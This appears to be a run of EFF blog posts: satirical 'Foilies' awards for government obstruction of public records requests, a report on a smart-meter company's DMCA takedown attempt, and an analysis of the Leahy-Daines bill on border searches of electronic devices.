As the Associated Press reported last year, lawsuits like these are reaching epidemic proportions. The Louisiana Department of Education sued a retired educator who was seeking school enrollment data for his blog. Portland Public Schools in Oregon sued a parent who was curious about employees paid while on leave for alleged misconduct. Michigan State University sued ESPN after it requested police reports on football players allegedly involved in a sexual assault. Meanwhile, the University of Kentucky and Western Kentucky University have each sued their own student newspapers whose reporters were investigating sexual misconduct by school staff.
These lawsuits are despicable. At their most charitable, they expose huge gaps in public records laws that put requesters on the hook for defending lawsuits they never anticipated. At their worst, they are part of a systematic effort to discourage reporters and concerned citizens from even thinking of filing a public records request in the first place.
The Lawless Agency Award - U.S. Customs and Border Protection
In the chaos of President Trump’s immigration ban in early 2017, the actions of U.S. Customs and Border Protection agents and higher-ups verged on unlawful. And if CBP officials already had their mind set on violating all sorts of laws and the Constitution, flouting FOIA seems like small potatoes.
Yet that’s precisely what CBP did when the ACLU filed a series of FOIA requests to understand local CBP agents’ actions as they implemented Trump’s immigration order. ACLU affiliates throughout the country filed 18 separate FOIA requests with CBP, each of which targeted records documenting how specific field offices, often located at airports or at physical border crossings, were managing and implementing the ban. The requests made clear that they were not seeking agency-wide documents but rather wanted information about each specific location’s activities.
CBP ignored the requests and, when several ACLU affiliates filed 13 different lawsuits, CBP sought to further delay responding by asking a federal court panel to consolidate all the cases into a single lawsuit. To use this procedure—which is usually reserved for class actions or other complex national cases—CBP essentially misled courts about each of the FOIA requests and claimed each was seeking the exact same set of records.
The court panel saw through CBP’s shenanigans and refused to consolidate the cases. But CBP basically ignored the panel’s decision, acting as though it had won. First, it behaved as though all the requests came from a single lawsuit by processing and batching all the documents from the various requests into a single production given to the ACLU. Second, it selectively released records to particular ACLU attorneys, even when those records weren’t related to their lawsuits about activities at local CBP offices.
Laughably, CBP blames the ACLU for its self-created mess, calling their requests and lawsuits “haphazard” and arguing that the ACLU and other FOIA requesters have strained the agency’s resources in seeking records about the immigration ban. None of that would be a problem if CBP had responded to the FOIA requests in the first place. Of course, the whole mess could also have been avoided if CBP never implemented an unconstitutional immigration order.
The Franz Kafka Award for Most Secrets About Secretive Secrecy - CIA
The CIA’s aversion to FOIA is legendary, but this year the agency doubled down on its mission of thwarting transparency. As Emma Best detailed for MuckRock, the intelligence agency had compiled a 20-page report that laid out at least 126 reasons why it could deny FOIA requests that officials believed would disclose the agency’s “sources and methods.”
But that report? Yeah, it’s totally classified. Which is what the agency told Best when they withheld the report in response to her request. So not only do you not get to know what the CIA’s up to, but its reasons for rejecting your FOIA request are also a state secret.
Special Recognition for Congressional Overreach - U.S. House of Representatives
Because Congress wrote the Freedom of Information Act, it had the awesome and not-at-all-a-conflict-of-interest power to determine which parts of the federal government must obey it. That’s why it may not shock you that since passing FOIA more than 50 years ago, Congress has never made itself subject to the law.
So far, requesters have been able to fill in the gaps by requesting records from federal agencies that correspond with Congress. For example, maybe a lawmaker writes to the U.S. Department of Puppies asking for statistics on labradoodles. That adorable email chain wouldn’t be available through Congress, but you could get it from the Puppies Department’s FOIA office. (Just to be clear: This isn’t a real federal agency. We just wish it was.)
In 2017, it became increasingly clear that some members of Congress believe that FOIA can never reach anything they do, even when they or their staffs share documents or correspond with federal agencies. The House Committee on Financial Services sent a threatening letter to the Treasury Department telling them not to comply with FOIA. After the Department of Health and Human Services and the Office of Management and Budget released records that came from the House Ways and Means Committee, the House intervened in litigation to argue that their records cannot be obtained under FOIA.
In many cases, congressional correspondence with agencies is automatically covered by FOIA, and the fact that a document originated with Congress isn’t by itself enough to shield it from disclosure. The Constitution says Congress gets to write laws; it’s just too bad it doesn’t require Congress to actually read them.
The Data Disappearance Award - Trump Administration
Last year, we gave the “Make America Opaque Again Award” to newly inaugurated President Trump for failing to follow tradition and release his tax returns during the campaign. His talent for refusing to make information available to the public has snowballed into an administration that deletes public records from government websites. From the National Park Service’s climate action plans for national parks, to the U.S.D.A. animal welfare datasets, to nonpartisan research on the corporate income tax, the Trump Administration has decided to make facts that don’t support its positions disappear. The best example of this vanishing game is the Environmental Protection Agency’s removal of the climate change website in April 2017, which only went back online after being scrubbed of climate change references, studies and information to educate the public.
The Danger in the Dark Award - The Army Corps of Engineers
When reporters researching the Dakota Access Pipeline on contested tribal lands asked for the U.S. Army Corps of Engineers’ environmental impact statement, they were told nope, you can’t have it. Officials cited public safety concerns as reason to deny the request: “The referenced document contains information related to sensitive infrastructure that if misused could endanger peoples’ lives and property.”
Funny thing is, the Army Corps had already published the same document on its website a year earlier. What changed in that year? Politics. The Standing Rock Sioux, other tribal leaders and “Water Protector” allies had since staged a multi-month peaceful protest and sit-in to halt construction of the pipeline.
The need for public scrutiny of the document became clear in June when a U.S. federal judge found that the environmental impact statement omitted key considerations, such as the impact of an oil spill on the Standing Rock Sioux’s hunting and fishing rights as well as the impact on environmental justice.
The Business Protection Agency Award - The Food and Drug Administration
The FDA’s mission is to protect the public from harmful pharmaceuticals, but they’ve recently fallen into the habit of protecting powerful drug companies rather than informing people about potential drug risks.
This past year, Charles Seife at Scientific American requested documents about the drug approval process for a controversial drug to treat Duchenne muscular dystrophy (DMD). The agency cited business exemptions and obscured the listed side effects as well as the testing methodology for the drug, despite claims that the drug company manipulated results during product trials and pressured the FDA to push an ineffective drug onto the market. The agency even redacted portions of a Bloomberg Businessweek article about the drug because the story provided names and pictures of teenagers living with DMD.
The Exhausted Mailman Award - Bureau of Indian Affairs
Requesting information that has already been made public should be quick and fairly simple—but not when you’re dealing with the Bureau of Indian Affairs. A nomination sent into EFF requested all logs of previously released FOIA information by the BIA. The requester even stated that he’d prefer links to the information, which agencies typically provide for records they have already put on their website. Instead, BIA printed 1,390 pages of those logs, stuffed them into 10 separate envelopes, and sent them via registered mail for a grand total cost to taxpayers of $179.
Crime & Punishment Award - Martin County Commissioners, Florida
Generally The Foilies skew cynical, because in many states, open records laws are toothless and treated as recommendations rather than mandates. One major exception to the rule is Florida, where violations of its “Sunshine Law” can result in criminal prosecution.
That brings us to Martin County Commissioners Ed Fielding and Sarah Heard and former Commissioner Anne Scott, each of whom were booked into jail in November on multiple charges related to violations of the state’s public records law. As Jose Lambiet of GossipExtra and the Miami Herald reported, the case emerges from a dispute between the county and a mining company that already resulted in taxpayers footing a $500,000 settlement in a public records lawsuit. Among the allegations, the officials were accused of destroying, delaying and altering records.
The cases are set to go to trial in December 2018, Lambiet told EFF. Of course, people are innocent until proven guilty, but that doesn’t make public officials immune to The Foilies.
The Square Footage Award - Jacksonville Sheriff’s Office (Florida)
When a government mistake results in a death, it’s important for the community to get all the facts. In the case of 63-year-old Blane Land, who was fatally hit by a Jacksonville Sheriff patrol car, those facts include dozens of internal investigations against the officer behind the wheel. The officer, Tim James, has since been arrested on allegations that he beat a handcuffed youth, raising the question of why he was still on duty after the vehicular fatality.
Land’s family hired an attorney, and the attorney filed a request for records. Rather than having a complete airing of the cop’s alleged misdeeds, the sheriff came back with a demand for $314,687.91 to produce the records, almost all of which was for processing and searching by the internal affairs division. Amid public outcry over the prohibitive fee, the sheriff took to social media to complain about how much work it would take to go through all the records in the 1,600-square-foot storage room filled with old-school filing cabinets.
The family is not responsible for the sheriff’s filing system or feng shui, nor is it the family’s fault that the sheriff kept an officer on the force as the complaints—and the accompanying disciplinary records—stacked up.

These Aren’t the Records You’re Looking For Award - San Diego City Councilmember Chris Cate
Shortly after last year’s San Diego Comic-Con and shortly before the release of Star Wars: The Last Jedi, the city of San Diego held a ceremony to name a street after former resident and actor Mark Hamill. A private citizen (whose day job involves writing The Foilies) wanted to know: How does a Hollywood star get his own roadway?
The city produced hundreds of pages related to the request, showing how an effort to rename Chargers Boulevard after the football team abandoned the city led to the creation of Mark Hamill Drive. The document set even included Twitter direct messages between City Councilmember Chris Cate and the actor. However, Cate used an ineffective black marker to redact them, accidentally releasing Hamill’s cell phone number and other personal contact details.
As tempting as it was to put Luke Skywalker (and the voice of the Joker) on speed dial, the requester did not want to be responsible for doxxing one of the world’s most beloved actors. He alerted Cate’s office to the error, and the office then re-uploaded properly redacted documents.
A Georgia energy company has made two separate attempts to take down public documents that let Seattle residents know how the “smart meters” on their homes work.
Back in 2016, a local activist obtained two documents from the City of Seattle related to the smart meter technology. But some companies involved in making and maintaining that technology went to court and won a quick order forcing the documents offline, arguing that information about the city’s meters constituted “trade secrets.”
EFF fought back, defending MuckRock’s First Amendment right to publish public documents obtained through a public records request. After our intervention, a Washington state court reversed the takedown order. In mid-2016, a settlement was reached with Landis + Gyr and Sensus, two of the companies that had attempted to remove the documents. Lawyers for the two companies explicitly agreed that the documents could remain public and published on MuckRock’s website.
But in February 2018, Landis + Gyr sent a DMCA notice demanding a takedown of the exact same documents that, two years earlier, it had explicitly agreed could remain online. A copy of the smart meter documents had been placed on DocumentCloud by Techdirt, a technology blog that had reported on the initial 2016 proceedings.
Techdirt noted the futility of trying to remove documents that were already online elsewhere, and suggested that all Landis + Gyr is doing is “reminding everyone that (1) these documents exist online and (2) apparently the company would prefer you not look at these public records about its own systems.”
Senators Patrick Leahy (D-VT) and Steve Daines (R-MT) introduced a new bill (S. 2462) that would better protect the privacy of travelers whose electronic devices—like cell phones and laptops—are searched and seized by border agents. While the new bill doesn’t require a probable cause warrant across the board like the Protecting Data at the Border Act (S. 823, H.R. 1899), it does have many positive provisions and would be a significant improvement over the status quo.
The Leahy-Daines bill, which currently has the long title of “A bill to place restrictions on searches and seizures of electronic devices at the border,” applies to U.S. persons, meaning U.S. citizens or lawful permanent residents. The bill places separate restrictions based on the type of search conducted: manual or forensic.
For “manual” searches of electronic devices, the bill requires that border agents—whether from U.S. Customs and Border Protection (CBP) or U.S. Immigration and Customs Enforcement (ICE)—have reasonable suspicion that the traveler violated an immigration or customs law and that the electronic device contains evidence relevant to the violation. The bill defines a manual search as an examination of an electronic device without the use of forensic software or the entry of a password. (Imagine a hands-on review of photos on a digital camera with no password on it, or a look through a phone not locked by a fingerprint scanner or passcode.) The definition also appears to include any type of search that lasts less than four hours or doesn’t involve the copying or documentation of data on the device. By contrast, the bill requires border agents to obtain a probable cause warrant before conducting a “forensic” search of an electronic device.
These rules would be an improvement over CBP’s current policy, which does not require any level of suspicion for manual searches, and requires reasonable suspicion for forensic searches—unless the forensic search is prompted by a “national security concern” (which we believe is a huge loophole). ICE’s policy continues to permit suspicionless border searches of electronic devices.
The Fourth Amendment, however, requires border agents to obtain a probable cause warrant before searching electronic devices given the unprecedented and significant privacy interests travelers have in their digital data. And the Constitution’s protections don’t turn on an arbitrary distinction between manual and forensic searches. Recent updates to CBP’s policy don’t cure the constitutional problems with how either agency conducts border searches (and seizures) of electronic devices.
The Leahy-Daines bill also requires that border agents have probable cause to seize an electronic device. They would then have to obtain a warrant from a judge within 48 hours. If a warrant is not obtained within 48 hours, the device must be “immediately” returned to the traveler. We support this probable cause requirement for device seizures, and it’s what we argue in our civil case against CBP and ICE, Alasaad v. Nielsen.
Importantly, the Leahy-Daines bill includes a suppression remedy if the government violates the law. This means that any information illegally obtained from a traveler’s electronic device during a border search may not be relied upon in any legal, administrative, or legislative proceeding, including an immigration hearing or a criminal trial.
The bill also includes important reporting requirements. These include statistics on the “age, sex, country of origin, citizenship or immigration status, ethnicity, and race” of travelers who were subject to device searches and seizures, which would shed light on whether border agents are acting in a discriminatory manner. The statistics also include the number of travelers whose devices were searched or seized and who were later charged with a crime, which would shed light on how effective border device searches and seizures are at rooting out criminals.
The border is not a Constitution-free zone. CBP searched over 30,000 devices last year and the number is rapidly increasing. We are glad to see some members of Congress turning their attention to the rampant problem of unconstitutional border searches and seizures of electronic devices—and the massive privacy invasions by the government that result.